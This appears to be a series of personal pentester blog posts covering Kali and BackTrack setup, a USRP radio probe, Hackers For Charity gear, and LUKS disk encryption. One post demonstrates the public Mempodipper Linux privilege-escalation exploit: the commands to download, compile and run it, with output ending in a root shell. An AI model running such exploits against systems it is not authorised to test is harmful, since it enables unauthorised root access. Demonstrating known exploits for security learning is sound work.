Pentesting on the Samsung Galaxy ?

Are all those pentest tools running on android ? Just went to and it seems some interesting stuff is cooking there. Cant wait for August the 1st🙂

Posted in Uncategorized | Leave a comment

Installing Virtualbox on Kali Linux

Hackers For Charity

A friend insisted I do this, else its pretty simple
root@kali:~# apt-get update

root@kali:~# apt-get upgrade

root@kali:~# apt-get dist-upgrade
root@kali:~# apt-get install linux-headers-$(uname -r)

root@kali:~# wget

root@kali:~# dpkg -i virtualbox-4.2_4.2.14-86644~Debian~wheezy_i386.deb

Thats all.

Posted in Uncategorized | 7 Comments

Into infinity I go

Hackers For Charity

So a buddy of mine, comodo(ty) decided to bring in one of these little cool babies to town. I can only say it is awesome. GSM(openbsc hahaha), RFID, Wireless here I come.

Managed to get her to “talk to me”.

root@bt:/home/chalo/Desktop/usrp# uhd_usrp_probe
linux; GNU C++ version 4.4.3; Boost_104000; UHD_003.004.002-188-unstable

— Opening a USRP2/N-Series device…
— Current recv frame size: 1472 bytes
— Current send frame size: 1472 bytes
| Device: USRP2 / N-Series Device
| _____________________________________________________
| /
| | Mboard: N200r4
| | hardware: 2576
| | mac-addr: a0:36:fa:26:33:ed
| | ip-addr:
| | subnet:
| | gateway:
| | gpsdo: none
| | serial: EER13VDUN
| | FW Version: 12.2
| | FPGA Version: 10.0
| |
| | Time sources: none, external, _external_, mimo
| | Clock sources: internal, external, mimo
| | Sensors: mimo_locked, ref_locked
| | _____________________________________________________
| | /
| | | RX DSP: 0
| | | Freq range: -50.000 to 50.000 Mhz
| | _____________________________________________________
| | /
| | | RX DSP: 1
| | | Freq range: -50.000 to 50.000 Mhz
| | _____________________________________________________
| | /
| | | RX Dboard: A
| | | ID: WBX v3, WBX v3 + Simple GDB (0x0057)
| | | Serial: E7R1DW6XW
| | | _____________________________________________________
| | | /
| | | | RX Frontend: 0
| | | | Name: WBXv3 RX+GDB
| | | | Antennas: TX/RX, RX2, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.5 step 0.5 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | RX Codec: A
| | | | Name: ads62p44
| | | | Gain range digital: 0.0 to 6.0 step 0.5 dB
| | | | Gain range fine: 0.0 to 0.5 step 0.1 dB
| | _____________________________________________________
| | /
| | | TX DSP: 0
| | | Freq range: -250.000 to 250.000 Mhz
| | _____________________________________________________
| | /
| | | TX Dboard: A
| | | ID: WBX v3 (0x0056)
| | | Serial: E7R1DW6XW
| | | ID: WBX + Simple GDB, WBX v3 + Simple GDB, WBX v4 + Simple GDB (0x004f)
| | | Serial: ECR1DV3GS
| | | _____________________________________________________
| | | /
| | | | TX Frontend: 0
| | | | Name: WBXv3 TX+GDB
| | | | Antennas: TX/RX, CAL
| | | | Sensors: lo_locked
| | | | Freq range: 68.750 to 2200.000 Mhz
| | | | Gain range PGA0: 0.0 to 31.0 step 1.0 dB
| | | | Connection Type: IQ
| | | | Uses LO offset: No
| | | _____________________________________________________
| | | /
| | | | TX Codec: A
| | | | Name: ad9777
| | | | Gain Elements: None

Posted in Uncategorized | Leave a comment

Cool stuff from HFC

Hackers For Charity

Recently i decided to pass by my friend Johnny to see how he is doing. He always gives me some cool security gear. Thanks Johnny

Jasager; to pwn all the wifi probes around

HFC stickers to spread the word around. Notice the cool shmoocon badge somewhere in there

Try harder from Offsec. This went straight to my laptop.

Throwing star lan tap. This is a cool gadget. Especially for internal pentests.

Posted in Uncategorized | Leave a comment

Backtrack 5 kernel whoops !!

Hackers For Charity

If you run Backtrack 5 r1 as a non-root user, and apparently many other kernels of linux >=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog Exploit code can be obtained here href=”

chalo@bt:~$ uname -a
Linux bt #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami

Posted in Uncategorized | 3 Comments

Installing backtrack on encrypted partition with luks

Hackers For Charity

Before you start please note that this process will format any data you have. Have a full backup of your system before you begin. Be sober while you are doing this please. I have tested the tutorial for backtrack 4 pre-final, backtrack 4 final, backtrack 5 and backtrack 5 r1.
Kindly note that my hardisk setup may be different than yours. I want to install backtrack as follows:

/dev/sda1 —– /boot partition
/dev/sda2 —– /root partition

My /root partition will be encrypted with luks such that in order for me to boot, i will have to enter a password.Boot with a live cd and proceed as follows
Kindly remember to change your partitions as necessary

Format the /root partition with luks. Enter the password you want to be using at startup.credits to opox90 for noting we need to use sha2 instead of sha1

root@bt:~# cryptsetup luksFormat -c aes-xts-plain64 -s 512 -h sha512 /dev/sdXX

Open the partion for mounting. Enter the password you entered above

root@bt:~# cryptsetup luksOpen /dev/sdXX root

Format the container with ext3 filesystem. You can use whichever linux filesystem you are comforable with

root@bt:~# mkfs.ext3 -j -O extent /dev/mapper/root

After this is done, run the backtrack installer( on backtrack desktop. Double clicking it should do.
Select your country.
Select the keyboard layout.

Then we now go to partition the disk . Select manual and click next

Select the partition for boot, for me thats /dev/sda1. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /boot

Select the partition for root, for me thats /dev/mapper/root. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /root

My final setup for the install looks as below. I know, my hardisk is rather small🙂

When you click next, you will get a warning about swapspace. I personally opt not to have swapspace. I have enough memory to run backtrack and a few virtual machines. Click “continue”

The next bit is important. Click “Advanced” .It is the location backtrack will install the bootloader. I usually install the bootloader to hd0 but you can install it to the linux partition. Even if you have windows, you can install the bootloader to hd0, and when it comes time to boot, you will be presented with options as to which os to boot.

You are now set for the install. Click install and wait for the backtrack install to finish. After its done, click the “continue using the live cd”
We need to make a few changes before we exit the live cd

root@bt:~# mkdir /mnt/root
root@bt:~# mount /dev/mapper/root /mnt/root/

Mount the /boot partition

root@bt:~# mount /dev/sdXX /mnt/root/boot
root@bt:~# mount -t proc proc /mnt/root/proc/
root@bt:~# mount -o bind /dev /mnt/root/dev/
root@bt:~# chroot /mnt/root/ /bin/bash

Using a text editor like vi or nano, edit the /etc/crypttab and add the /root partition here

root /dev/sdXX none luks

Using a text editor like vi or nano, edit the /etc/fstab file. Remove any other lines you will find and leave your file in the below order. Replace the XX with your partitions

/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
/dev/sdXX /boot ext3 defaults 0 0

Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file


Create the new initrd image

root@bt:~# update-initramfs -k all -c

Install grub to your harddisk. Use the device name and not a partition e.g /dev/sda

root@bt:~# grub-install /dev/sdX

root@bt:~# exit

root@bt:~# reboot

Your /root partition should now be encrypted and you will be asked a password when booting to decrypt it.

Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.

Posted in Uncategorized | 14 Comments

Swag 2.0 Beta

Hackers For Charity

Went to Uganda, met Johnny, I let pictures say the rest. But this beats cool at so many levels. thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now because they are with a pal. Enjoy the gallery.Its an honor for me

And Johnny is back, what do I mean, he is back to security.Watch this small space. It was a nice cathcup, we spoke of the sweetness of the pwnphone amongst other good things. He is ok, please remember donating to HFC. Ok, enough talk.

Look at this cool dirty security tshirt. Actually I had to put it on on my way back. This just rocks

And a backtrack revolution shirt from the offsec team. Oh my..

And this hackers for charity defcon shirt to top up the collection. This made heads turn in Nairobi when I put it on.

Posted in Uncategorized | Leave a comment